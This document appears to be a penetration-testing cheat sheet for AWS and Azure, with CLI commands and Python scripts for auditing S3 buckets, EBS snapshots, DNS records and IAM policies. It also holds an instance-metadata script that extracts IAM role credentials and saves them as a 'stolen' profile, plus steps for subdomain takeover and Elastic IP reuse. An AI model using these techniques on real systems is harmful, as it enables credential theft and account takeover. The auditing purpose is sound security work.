Cloud Providers Security


Microsoft Azure

MicroBurst: A PowerShell Toolkit for Attacking Azure

PS>Import-Module .\MicroBurst.psm1
PS>Get-Help Get-AzurePasswords

Amazon AWS

AWS S3 Bucket/Object Finder

Check bucket ACLs and policies (the group URIs to look for are .../groups/global/AllUsers and .../groups/global/AuthenticatedUsers):

$for bucket in $(aws s3 ls | awk '{print $3}'); do echo "Bucket: $bucket"; aws s3api get-bucket-acl --bucket "$bucket" --query "Grants[?Grantee.Type=='Group'].[Grantee.URI,Permission]" --output text; aws s3api get-bucket-policy --bucket "$bucket" --output text 2>/dev/null; done
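The same two checks as the loop above, as a script that classifies the responses instead of leaving you to read them. This is an added example, not code from the original page: it flags ACL grants to the AllUsers / AuthenticatedUsers groups and bucket-policy Allow statements with a wildcard Principal. The sample ACL and policy are constructed; the live audit_account() function assumes boto3 is installed and a profile is configured.

```python
"""Flag S3 buckets whose ACL or bucket policy grants access to everyone.
Added example (not from the original page). audit_account() uses boto3 with
the same calls the aws CLI loop wraps (get_bucket_acl, get_bucket_policy);
the classification functions run on any JSON of that shape.
"""
import json

# Grantee URIs S3 uses for "anyone" and "any AWS account" in ACLs.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return [(group, permission)] for ACL grants to AllUsers/AuthenticatedUsers."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            found.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return found


def _principal_is_everyone(principal):
    # Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = aws if isinstance(aws, list) else [aws]
        return "*" in aws
    return False


def public_policy_statements(policy):
    """Return the Action lists of Allow statements with a wildcard Principal."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    statements = doc.get("Statement", [])
    statements = statements if isinstance(statements, list) else [statements]
    hits = []
    for st in statements:
        if st.get("Effect") == "Allow" and _principal_is_everyone(st.get("Principal")):
            actions = st.get("Action", [])
            hits.append(actions if isinstance(actions, list) else [actions])
    return hits


def audit_bucket(acl, policy=None):
    """Combine both checks into one list of human-readable findings."""
    findings = [f"ACL grants {perm} to {group}" for group, perm in public_acl_grants(acl)]
    if policy:
        for actions in public_policy_statements(policy):
            findings.append("policy allows " + ",".join(actions) + " to Principal *")
    return findings


# Constructed sample responses in the shape of get-bucket-acl / get-bucket-policy output.
SAMPLE_ACL = {
    "Owner": {"ID": "abc"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "abc"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket"},
    ],
})


def audit_account(profile=None):
    """Live run: apply the checks to every bucket the profile can list (needs boto3)."""
    import boto3
    from botocore.exceptions import ClientError
    s3 = boto3.Session(profile_name=profile).client("s3")
    report = {}
    for b in s3.list_buckets()["Buckets"]:
        acl = s3.get_bucket_acl(Bucket=b["Name"])
        try:
            policy = s3.get_bucket_policy(Bucket=b["Name"])["Policy"]
        except ClientError as e:
            if e.response["Error"]["Code"] != "NoSuchBucketPolicy":
                raise
            policy = None
        report[b["Name"]] = audit_bucket(acl, policy)
    return report


if __name__ == "__main__":
    for line in audit_bucket(SAMPLE_ACL, SAMPLE_POLICY):
        print("example-bucket:", line)
```

Bucket ACLs and bucket policies are evaluated together, so a bucket with a clean ACL can still be world-readable through its policy (and the other way round); a Condition block on a wildcard-Principal statement (for example restricting aws:SourceIp) is not inspected here and should be read by hand.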

  • List a bucket (recursive, with sizes):
$aws s3 ls s3://mybucket --recursive --human-readable --summarize

Without credentials (anonymous listing; works when the bucket grants List to AllUsers):

$aws s3 ls s3://$BUCKET/ --no-sign-request --region us-west-2

  • Download a file:
$aws --profile $PROFILE s3 cp s3://$BUCKET/$FILE .

  • Read an object, read its ACL, and test write access (the put-object call really writes; see below for a non-destructive check):
$aws s3api get-object --bucket $BUCKET --key $FILE $FILE
$aws s3api get-object-acl --bucket $BUCKET --key $FILE
$aws s3api put-object --bucket $BUCKET --key $FILE --body $FILE

CHECK BUCKET_WRITE without writing:

The trick: send a PUT whose Content-MD5 header does not match the body. If the key has write permission, S3 gets as far as checking the digest and rejects the request with "The Content-MD5 you specified did not match what we received" (nothing is stored); without write permission the request fails earlier with AccessDenied. The script signs with AWS signature version 2, so it only works against buckets in regions that still accept SigV2.

#!/usr/bin/env bash
# use this by: ./s3-write-check.sh test-bucket/write.txt
# needs AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in the environment
set -u
AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)"
AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)"
date=$(date -u +"%a, %d %b %Y %T %z")
content_type="application/octet-stream"
acl="x-amz-acl:private"

# we create a checksum of the word "yepp", but will upload a file with the content "nope".
content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64)

# SigV2 string to sign: verb, Content-MD5, Content-Type, Date, x-amz-* headers, resource
string="PUT\n${content_md5}\n${content_type}\n${date}\n${acl}\n/${AWS_S3_BUCKET}${AWS_PATH}"
signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64)

echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}"
result=$(curl -s -X PUT --data "nope" \
  -H "Host: ${AWS_S3_BUCKET}.s3.amazonaws.com" \
  -H "Date: ${date}" \
  -H "Content-Type: ${content_type}" \
  -H "Content-MD5: ${content_md5}" \
  -H "${acl}" \
  -H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" \
  "https://${AWS_S3_BUCKET}.s3.amazonaws.com${AWS_PATH}")

if echo "${result}" | grep -q 'The Content-MD5 you specified did not match what we received'; then
  echo "write access: yes (S3 rejected the bad digest, nothing was stored)"
  exit 0
fi
echo "${result}"
exit 1

Open EC2 Snapshots

Without an owner filter, describe-snapshots also returns every public snapshot in the region (tens of thousands of them):

$aws --profile $PROFILE ec2 describe-snapshots

Get the account id of the credentials you hold, then list only the snapshots that account owns:

$aws --profile $PROFILE sts get-caller-identity
$aws --profile $PROFILE ec2 describe-snapshots --owner-ids $ID

To mount a snapshot, create a volume from it in the availability zone of an instance you control, then attach the volume to that instance and mount it from inside the instance:

$aws --profile $PROFILE ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id $SID
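The check that makes a snapshot "open" is its createVolumePermission attribute: a snapshot shared with the group "all" can be restored by any AWS account. The script below, an added example rather than code from the page, lists an account's snapshots, asks for that attribute on each, and reports the public ones; restore_to_instance() then does the create-volume / wait / attach-volume sequence the page starts. The sample responses are constructed; the live functions assume boto3 and a configured profile.

```python
"""Find EBS snapshots an account shares publicly, then restore one to an instance.
Added example, not from the page. The live functions use boto3 with the EC2
calls the CLI lines wrap (describe-snapshots, describe-snapshot-attribute,
create-volume, attach-volume); the classification runs on the returned JSON.
"""


def is_public(create_volume_permissions):
    """True when createVolumePermission contains the group 'all' (any account may restore it)."""
    return any(p.get("Group") == "all" for p in create_volume_permissions)


def public_snapshots(snapshots, permissions):
    """Return the ids of snapshots whose createVolumePermission includes Group=all.
    snapshots: the Snapshots list from describe-snapshots.
    permissions: {SnapshotId: CreateVolumePermissions list} from describe-snapshot-attribute.
    """
    return [s["SnapshotId"] for s in snapshots
            if is_public(permissions.get(s["SnapshotId"], []))]


# Constructed sample output in the shape of the two API responses.
SAMPLE_SNAPSHOTS = [
    {"SnapshotId": "snap-0aaa", "OwnerId": "123456789012", "Encrypted": False,
     "Description": "prod db backup"},
    {"SnapshotId": "snap-0bbb", "OwnerId": "123456789012", "Encrypted": True,
     "Description": "ami root"},
    {"SnapshotId": "snap-0ccc", "OwnerId": "123456789012", "Encrypted": False,
     "Description": "scratch"},
]
SAMPLE_PERMISSIONS = {
    "snap-0aaa": [{"Group": "all"}],             # public
    "snap-0bbb": [],                             # private
    "snap-0ccc": [{"UserId": "210987654321"}],   # shared with one account, not public
}


def find_public_snapshots(profile=None, region="us-west-2"):
    """Live: list this account's snapshots and check each one's sharing attribute."""
    import boto3
    ec2 = boto3.Session(profile_name=profile, region_name=region).client("ec2")
    snaps, perms = [], {}
    for page in ec2.get_paginator("describe_snapshots").paginate(OwnerIds=["self"]):
        for s in page["Snapshots"]:
            snaps.append(s)
            attr = ec2.describe_snapshot_attribute(SnapshotId=s["SnapshotId"],
                                                   Attribute="createVolumePermission")
            perms[s["SnapshotId"]] = attr["CreateVolumePermissions"]
    return public_snapshots(snaps, perms)


def restore_to_instance(snapshot_id, instance_id, az, device="/dev/sdf",
                        profile=None, region="us-west-2"):
    """Live: create a volume from the snapshot in the instance's AZ and attach it.
    Then, on the instance: lsblk; sudo mount -o ro /dev/xvdf1 /mnt (read-only keeps
    the evidence intact). Returns the new volume id."""
    import boto3
    ec2 = boto3.Session(profile_name=profile, region_name=region).client("ec2")
    vol = ec2.create_volume(AvailabilityZone=az, SnapshotId=snapshot_id)["VolumeId"]
    ec2.get_waiter("volume_available").wait(VolumeIds=[vol])
    ec2.attach_volume(VolumeId=vol, InstanceId=instance_id, Device=device)
    return vol


if __name__ == "__main__":
    print("public snapshots (sample):", public_snapshots(SAMPLE_SNAPSHOTS, SAMPLE_PERMISSIONS))
```

Encrypted snapshots can only be restored by accounts that can use the KMS key, so an Encrypted: true snapshot shared publicly is usually not recoverable by a third party; unencrypted ones are.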

Abusing instance metadata in an SSRF or internal attack

Internal access
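The metadata service lives at http://169.254.169.254 and hands out the instance role's temporary credentials at /latest/meta-data/iam/security-credentials/<role>. The script below is an added example, not code from the page: it performs the IMDSv2 exchange (PUT for a session token, then GET with the token header) and falls back to the plain IMDSv1 GET when the token request fails, then renders the credentials as a CLI profile. The transport is injectable so the flow can be exercised against canned responses; the canned responses and the role name web-role are constructed.

```python
"""Pull IAM role credentials from the EC2 instance metadata service (IMDS).
Added example, not from the page. Shows the IMDSv2 token exchange with an
IMDSv1 fallback; `fetch` is any callable (method, url, headers) -> (status, body),
defaulting to urllib. Only the canned transport works outside an EC2 instance.
"""
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def http(method, url, headers=None, timeout=2):
    """Default transport: return (status, body) without raising on HTTP errors."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def imds_token(fetch=http, ttl=21600):
    """IMDSv2 step 1: PUT /latest/api/token. Returns None when the instance does
    not answer (for example the request came through an SSRF that can only GET,
    or through a proxy that exceeded the hop limit)."""
    status, body = fetch("PUT", IMDS + "/latest/api/token",
                         {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})
    return body if status == 200 else None


def role_credentials(fetch=http):
    """Return (role_name, credentials dict), or (None, None) if no role or IMDS blocked."""
    token = imds_token(fetch)
    headers = {"X-aws-ec2-metadata-token": token} if token else {}   # v2 if we got a token, else v1
    status, role = fetch("GET", IMDS + CREDS_PATH, headers)
    if status != 200 or not role.strip():
        return None, None
    role = role.strip().splitlines()[0]
    status, body = fetch("GET", IMDS + CREDS_PATH + role, headers)
    if status != 200:
        return None, None
    return role, json.loads(body)


def as_profile(creds, name="stolen"):
    """Render the credentials as an ~/.aws/credentials profile block for the CLI."""
    return "\n".join([
        f"[{name}]",
        f"aws_access_key_id = {creds['AccessKeyId']}",
        f"aws_secret_access_key = {creds['SecretAccessKey']}",
        f"aws_session_token = {creds['Token']}",
    ])


# Constructed responses in the shape a real instance returns.
SAMPLE_CREDS = {"Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAEXAMPLE",
                "SecretAccessKey": "secret", "Token": "tok",
                "Expiration": "2030-01-01T00:00:00Z"}
SAMPLE_CREDS_JSON = json.dumps(SAMPLE_CREDS)


def fake_imdsv2(method, url, headers=None, timeout=2):
    """Canned transport for an IMDSv2-only instance: GETs without the token get 401."""
    if method == "PUT" and url.endswith("/latest/api/token"):
        return 200, "AQAAAtoken"
    if (headers or {}).get("X-aws-ec2-metadata-token") != "AQAAAtoken":
        return 401, ""
    if url == IMDS + CREDS_PATH:
        return 200, "web-role\n"
    if url == IMDS + CREDS_PATH + "web-role":
        return 200, SAMPLE_CREDS_JSON
    return 404, ""


if __name__ == "__main__":
    role, creds = role_credentials()   # live: only answers from inside an EC2 instance
    print(role, as_profile(creds) if creds else "no role credentials via IMDS")
```

Through a typical SSRF you control only the URL of a GET, so the PUT in step 1 is impossible and an IMDSv2-only instance gives nothing; a host that still accepts IMDSv1 hands the credentials to the single GET. The session token must be sent along with the key pair (aws_session_token), otherwise the calls fail as InvalidClientTokenId.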


AWS Subdomain Takeover

  • How to test it:

Resolve all subdomains with massdns and look for names that return SERVFAIL or REFUSED (NXDOMAIN is worth a look too). For each one, check whether its CNAME points at an AWS resource that no longer exists (an Elastic Beanstalk environment, an S3 website bucket, ...); if the name is free, creating that resource in your own account serves content under the victim's subdomain.

Re-using AWS Elastic IPs

When an instance or Elastic IP is released but its DNS record is left behind, the address returns to the EC2 pool and can be allocated to anyone's account. An attacker allocates addresses until one matches a stale record and then serves traffic for the victim's name. Associating an address you hold:

$aws ec2 associate-address --instance-id $ID --public-ip $IP

(--public-ip is the EC2-Classic form; in a VPC the address is first allocated with allocate-address and then associated by its --allocation-id.)

  • How to test it:

List all DNS type A entries of a domain and check that every IP that falls in EC2 address space is still allocated to the account (compare against describe-addresses and the public IPs of describe-instances).

Internal IPs in public domains

Public DNS records must not resolve to private (RFC 1918) or link-local addresses; they leak internal names and topology to anyone who can query the zone.
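One triage pass covering the three DNS checks above (dangling CNAMEs to AWS hostnames, A records in EC2 address space the account no longer holds, and private addresses in public zones). This is an added example, not code from the page: the input is the record list your resolver run produced (massdns, dig), the EC2 prefixes come from the shape of https://ip-ranges.amazonaws.com/ip-ranges.json, and owned_public_ips() assumes boto3 and a profile. The sample records, prefixes and owned addresses are constructed.

```python
"""Triage a domain's DNS records for AWS subdomain takeover, re-usable Elastic IPs
and internal addresses leaking through public zones. Added example, not from the page.
"""
import ipaddress

# CNAME targets an attacker can re-create once the original resource is gone.
# Heuristic: Elastic Beanstalk names stop resolving when the environment is deleted;
# S3 wildcard DNS answers for any bucket name, so an S3 target needs an HTTP
# NoSuchBucket check rather than an rcode check.
TAKEOVER_SUFFIXES = (".elasticbeanstalk.com", ".amazonaws.com")
FAILED = {"NXDOMAIN", "SERVFAIL", "REFUSED"}


def ec2_networks(ip_ranges):
    """Networks tagged EC2 in ip-ranges.json (Elastic IPs are allocated from these)."""
    return [ipaddress.ip_network(p["ip_prefix"])
            for p in ip_ranges["prefixes"] if p["service"] == "EC2"]


def triage(records, ec2_nets, owned_ips):
    """records: (name, rtype, value, rcode) tuples from the resolver run.
    owned_ips: public IPs the account currently holds (instances + Elastic IPs).
    Returns (name, finding, value) for each record worth acting on."""
    findings = []
    for name, rtype, value, rcode in records:
        if rtype == "A":
            ip = ipaddress.ip_address(value)
            if ip.is_private:
                findings.append((name, "internal-ip", value))
            elif any(ip in net for net in ec2_nets) and value not in owned_ips:
                findings.append((name, "dangling-eip", value))
        elif rtype == "CNAME" and rcode in FAILED and value.rstrip(".").endswith(TAKEOVER_SUFFIXES):
            findings.append((name, "takeover-candidate", value))
    return findings


# Constructed sample input.
SAMPLE_RECORDS = [
    ("www.example.com", "A", "52.10.20.30", "NOERROR"),        # EC2 range, still owned
    ("old.example.com", "A", "52.10.20.31", "NOERROR"),        # EC2 range, released
    ("intranet.example.com", "A", "10.0.3.7", "NOERROR"),      # private address in public DNS
    ("files.example.com", "CNAME", "files-prod.s3.amazonaws.com", "NOERROR"),  # resolves; check over HTTP
    ("app.example.com", "CNAME", "app-env.us-west-2.elasticbeanstalk.com", "SERVFAIL"),
    ("blog.example.com", "CNAME", "example.github.io", "NXDOMAIN"),  # not AWS; out of scope here
]
SAMPLE_RANGES = {"prefixes": [
    {"ip_prefix": "52.10.0.0/15", "region": "us-west-2", "service": "EC2"},
    {"ip_prefix": "52.92.16.0/20", "region": "us-west-2", "service": "S3"},
]}
SAMPLE_OWNED = {"52.10.20.30"}


def owned_public_ips(profile=None, region="us-west-2"):
    """Live: every public IP the account holds in the region (needs boto3)."""
    import boto3
    ec2 = boto3.Session(profile_name=profile, region_name=region).client("ec2")
    ips = {a["PublicIp"] for a in ec2.describe_addresses()["Addresses"]}
    for page in ec2.get_paginator("describe_instances").paginate():
        for reservation in page["Reservations"]:
            for inst in reservation["Instances"]:
                if "PublicIpAddress" in inst:
                    ips.add(inst["PublicIpAddress"])
    return ips


if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS, ec2_networks(SAMPLE_RANGES), SAMPLE_OWNED):
        print(*finding)
```

A "dangling-eip" hit only proves the address is not yours any more; whoever holds it now may be a harmless stranger or an attacker already serving content for the name, so resolve and fetch the name before reporting.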

Check IAM and policies

$aws --profile $PROFILE iam get-user

$aws --profile $PROFILE iam list-attached-user-policies --user-name $USERNAME

Attached managed policies are only part of the picture: inline policies (list-user-policies / get-user-policy) and the policies of the user's groups (list-groups-for-user) apply as well, and the actual statements come from get-policy-version with the policy's default version.
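Listing policy names is rarely enough; what matters is which actions the statements grant. The script below is an added example, not code from the page: it fetches a user's managed and inline policy documents with the boto3 equivalents of the CLI calls above, then flags Allow statements that match a heuristic list of privilege-escalation actions (iam:PassRole, iam:CreateAccessKey, iam:AttachUserPolicy, ...), honouring explicit Deny statements on Resource "*". The sample policies and the user name are constructed; user_policies() assumes boto3 and a configured profile.

```python
"""Expand an IAM user's policies and flag privilege-escalation grants.
Added example, not from the page. user_policies() wraps list-attached-user-policies,
get-policy, get-policy-version, list-user-policies and get-user-policy;
risky_grants() works on any dict of {policy name: policy document}.
"""
import fnmatch

# Actions that, granted broadly, usually let the identity become an administrator.
# Heuristic list; extend it for your environment.
ESCALATION_ACTIONS = [
    "iam:CreateAccessKey", "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:AttachUserPolicy", "iam:AttachRolePolicy", "iam:PutUserPolicy",
    "iam:PutRolePolicy", "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:PassRole", "sts:AssumeRole", "lambda:CreateFunction", "ec2:RunInstances",
]


def _as_list(x):
    return x if isinstance(x, list) else [x]


def statements(policies, effect):
    """Yield (policy_name, action_pattern, resource) for statements with the given Effect.
    NotAction / NotResource statements are skipped and need manual review."""
    for name, doc in policies.items():
        for st in _as_list(doc.get("Statement", [])):
            if st.get("Effect") != effect or "Action" not in st:
                continue
            for action in _as_list(st["Action"]):
                for resource in _as_list(st.get("Resource", "*")):
                    yield name, action, resource


def risky_grants(policies):
    """Return sorted (policy_name, action, resource) for escalation actions that are
    allowed and not explicitly denied on Resource "*". Action patterns such as
    "iam:*" are matched with fnmatch, case-insensitively as IAM does."""
    denied = {pat.lower() for _, pat, res in statements(policies, "Deny") if res == "*"}
    hits = set()
    for name, pattern, resource in statements(policies, "Allow"):
        for action in ESCALATION_ACTIONS:
            a = action.lower()
            if fnmatch.fnmatchcase(a, pattern.lower()) and \
                    not any(fnmatch.fnmatchcase(a, d) for d in denied):
                hits.add((name, action, resource))
    return sorted(hits)


# Constructed sample: one managed read-only policy, one inline deploy policy, one broad policy.
SAMPLE_POLICIES = {
    "ReadOnlyAccess": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*", "ec2:Describe*"], "Resource": "*"}]},
    "deploy-inline": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["lambda:CreateFunction", "iam:PassRole"],
         "Resource": "arn:aws:iam::123456789012:role/lambda-exec"},
        {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"}]},   # explicit deny wins
    "ops": {"Version": "2012-10-17", "Statement":
            {"Effect": "Allow", "Action": "iam:Create*", "Resource": "*"}},
}


def user_policies(username, profile=None):
    """Live: collect the user's attached managed and inline policy documents (needs boto3).
    Group policies (list-groups-for-user) are not included here."""
    import boto3
    iam = boto3.Session(profile_name=profile).client("iam")
    docs = {}
    for p in iam.list_attached_user_policies(UserName=username)["AttachedPolicies"]:
        version = iam.get_policy(PolicyArn=p["PolicyArn"])["Policy"]["DefaultVersionId"]
        docs[p["PolicyName"]] = iam.get_policy_version(
            PolicyArn=p["PolicyArn"], VersionId=version)["PolicyVersion"]["Document"]
    for name in iam.list_user_policies(UserName=username)["PolicyNames"]:
        docs[name] = iam.get_user_policy(UserName=username, PolicyName=name)["PolicyDocument"]
    return docs


if __name__ == "__main__":
    for name, action, resource in risky_grants(SAMPLE_POLICIES):
        print(f"{name}: {action} on {resource}")
```

Resource-scoped grants still matter: lambda:CreateFunction together with iam:PassRole on a single role is enough to run code as that role, so read the flagged resources rather than dismissing anything that is not "*".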